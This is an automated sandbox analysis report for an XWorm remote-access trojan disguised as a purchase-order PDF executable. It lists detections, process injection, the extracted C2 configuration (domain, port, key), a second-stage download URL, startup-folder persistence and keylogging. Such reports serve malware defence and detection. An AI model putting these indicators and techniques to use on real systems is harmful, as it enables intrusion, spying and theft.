Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO#8329837372938383839238PDF.exe

Overview

General Information

Sample name:PO#8329837372938383839238PDF.exe
Analysis ID:1559973
MD5:ba88dca6e9d0a6f55a8addc30b02d988
SHA1:f48b8d8255a9192675dde74ef7db412fcb528792
SHA256:b15e57df1ab1fc902337d52f633267b802ccee6f37ba21ca065ae14380817081
Tags:exeuser-lowmal3
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PO#8329837372938383839238PDF.exe (PID: 2104 cmdline: "C:\Users\user\Desktop\PO#8329837372938383839238PDF.exe" MD5: BA88DCA6E9D0A6F55A8ADDC30B02D988)
    • InstallUtil.exe (PID: 4140 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • WerFault.exe (PID: 1016 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 904 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["nwamama.ydns.eu"], "Port": 3791, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3396289534.0000000000732000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000003.00000002.3396289534.0000000000732000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x777e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x781b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x7930:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x742c:$cnc4: POST / HTTP/1.1
    00000000.00000002.2261337543.00000000074D0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000000.00000002.2256839554.0000000004381000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000000.00000002.2237773509.0000000003752000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          Click to see the 6 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.PO#8329837372938383839238PDF.exe.74d0000.11.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            0.2.PO#8329837372938383839238PDF.exe.38405b8.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
              0.2.PO#8329837372938383839238PDF.exe.38405b8.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x5b7e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x5c1b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x5d30:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x582c:$cnc4: POST / HTTP/1.1
              3.2.InstallUtil.exe.730000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                3.2.InstallUtil.exe.730000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0x797e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x7a1b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x7b30:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0x762c:$cnc4: POST / HTTP/1.1
                Click to see the 3 entries

                Sigma Signatures

                Data Obfuscation

                barindex
                Sigma detected: Drops script at startup location
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exe, ProcessId: 2104, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SupportsDynamicPartitions.vbs

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: nwamama.ydns.euAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 00000000.00000002.2237773509.0000000003752000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["nwamama.ydns.eu"], "Port": 3791, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\SupportsDynamicPartitions.exeReversingLabs: Detection: 18%
                Multi AV Scanner detection for submitted file
                Source: PO#8329837372938383839238PDF.exeVirustotal: Detection: 33%Perma Link
                Source: PO#8329837372938383839238PDF.exeReversingLabs: Detection: 18%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\SupportsDynamicPartitions.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: PO#8329837372938383839238PDF.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.raw.unpackString decryptor: nwamama.ydns.eu
                Source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.raw.unpackString decryptor: 3791
                Source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.raw.unpackString decryptor: <123456789>
                Source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.raw.unpackString decryptor: <Xwormmm>
                Source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.raw.unpackString decryptor: XWorm V5.6
                Source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.raw.unpackString decryptor: USB.exe
                Source: PO#8329837372938383839238PDF.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:49714 version: TLS 1.2
                Source: PO#8329837372938383839238PDF.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: HP<o8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3396210878.00000000006F7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbYQXX source: InstallUtil.exe, 00000003.00000002.3397365470.00000000009F2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdbT source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A07000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.000000000463E000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2261970867.00000000075C0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: ((.pdb source: InstallUtil.exe, 00000003.00000002.3396210878.00000000006F7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A07000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\InstallUtil.pdbI source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: osymbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3396210878.00000000006F7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.000000000463E000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2261970867.00000000075C0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3396210878.00000000006F7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004381000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2261142304.0000000007400000.00000004.08000000.00040000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004590000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004381000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2261142304.0000000007400000.00000004.08000000.00040000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004590000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3396210878.00000000006F7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbp' source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 00000003.00000002.3397365470.00000000009F2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\System.pdbpdbtem.pdbtion source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdbal source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\System.pdbed[ source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.pdb source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\InstallUtil.pdb( source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A54000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: InstallUtil.pdbJC source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDB`w; source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb- source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A54000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: @Ho.pdb source: InstallUtil.exe, 00000003.00000002.3396210878.00000000006F7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\System.pdb0. source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb03 source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ?HoC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3396210878.00000000006F7000.00000004.00000010.00020000.00000000.sdmp

                Networking

                barindex
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: nwamama.ydns.eu
                Source: global trafficHTTP traffic detected: GET /rindasq/Karjsfww.vdf HTTP/1.1Host: sierrassinfinusadas.com.arConnection: Keep-Alive
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /rindasq/Karjsfww.vdf HTTP/1.1Host: sierrassinfinusadas.com.arConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: sierrassinfinusadas.com.ar
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2237773509.0000000003381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004381000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2261142304.0000000007400000.00000004.08000000.00040000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004381000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2261142304.0000000007400000.00000004.08000000.00040000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004381000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2261142304.0000000007400000.00000004.08000000.00040000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2237773509.00000000034AD000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2237773509.0000000003381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sierrassinfinusadas.com.ar
                Source: PO#8329837372938383839238PDF.exe, SupportsDynamicPartitions.exe.0.drString found in binary or memory: https://sierrassinfinusadas.com.ar/rindasq/Karjsfww.vdf
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004381000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2261142304.0000000007400000.00000004.08000000.00040000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004381000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2237773509.0000000003752000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2261142304.0000000007400000.00000004.08000000.00040000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004381000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2261142304.0000000007400000.00000004.08000000.00040000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:49714 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to log keystrokes (.Net Source)
                Source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 3.2.InstallUtil.exe.730000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000003.00000002.3396289534.0000000000732000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000000.00000002.2237773509.0000000003752000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: PO#8329837372938383839238PDF.exe
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeCode function: 0_2_0332EA600_2_0332EA60
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeCode function: 0_2_0332AE900_2_0332AE90
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeCode function: 0_2_0332AE800_2_0332AE80
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeCode function: 0_2_0332B4D80_2_0332B4D8
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeCode function: 0_2_07E5EE200_2_07E5EE20
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeCode function: 0_2_07E5E1D80_2_07E5E1D8
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeCode function: 0_2_07E400400_2_07E40040
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeCode function: 0_2_07E4003F0_2_07E4003F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_009B0ECC3_2_009B0ECC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 904
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2262795795.0000000007EE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQdfznao.exe0 vs PO#8329837372938383839238PDF.exe
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2260131036.0000000007140000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGkuelov.dll" vs PO#8329837372938383839238PDF.exe
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004381000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO#8329837372938383839238PDF.exe
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2236686816.000000000153E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO#8329837372938383839238PDF.exe
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2237773509.0000000003CD4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamex-rawfile.exe4 vs PO#8329837372938383839238PDF.exe
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000000.2131113698.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQdfznao.exe0 vs PO#8329837372938383839238PDF.exe
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.000000000463E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO#8329837372938383839238PDF.exe
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2237773509.0000000003752000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs PO#8329837372938383839238PDF.exe
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2237773509.0000000003752000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamex-rawfile.exe4 vs PO#8329837372938383839238PDF.exe
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2261142304.0000000007400000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO#8329837372938383839238PDF.exe
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004590000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO#8329837372938383839238PDF.exe
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004590000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQdfznao.exe0 vs PO#8329837372938383839238PDF.exe
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004590000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGkuelov.dll" vs PO#8329837372938383839238PDF.exe
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2261970867.00000000075C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO#8329837372938383839238PDF.exe
                Source: PO#8329837372938383839238PDF.exeBinary or memory string: OriginalFilenameQdfznao.exe0 vs PO#8329837372938383839238PDF.exe
                Source: PO#8329837372938383839238PDF.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 3.2.InstallUtil.exe.730000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000003.00000002.3396289534.0000000000732000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000000.00000002.2237773509.0000000003752000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                Source: PO#8329837372938383839238PDF.exe, ConnectionTaskList.csTask registration methods: 'RegisterSchema', 'RegisterConnection'
                Source: PO#8329837372938383839238PDF.exe, CreatorProxyAuth.csTask registration methods: 'CreateTask'
                Source: SupportsDynamicPartitions.exe.0.dr, ConnectionTaskList.csTask registration methods: 'RegisterSchema', 'RegisterConnection'
                Source: SupportsDynamicPartitions.exe.0.dr, CreatorProxyAuth.csTask registration methods: 'CreateTask'
                Source: 0.2.PO#8329837372938383839238PDF.exe.468ed70.6.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                Source: 0.2.PO#8329837372938383839238PDF.exe.468ed70.6.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                Source: 0.2.PO#8329837372938383839238PDF.exe.468ed70.6.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 0.2.PO#8329837372938383839238PDF.exe.468ed70.6.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: 0.2.PO#8329837372938383839238PDF.exe.468ed70.6.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO#8329837372938383839238PDF.exe.468ed70.6.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO#8329837372938383839238PDF.exe.468ed70.6.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.PO#8329837372938383839238PDF.exe.468ed70.6.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@4/3@2/1
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SupportsDynamicPartitions.vbsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1016:64:WilError_03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\bUIwrJMMMqrauUWR
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\6802be69-19cf-4321-b8d8-8e0cd8187af3Jump to behavior
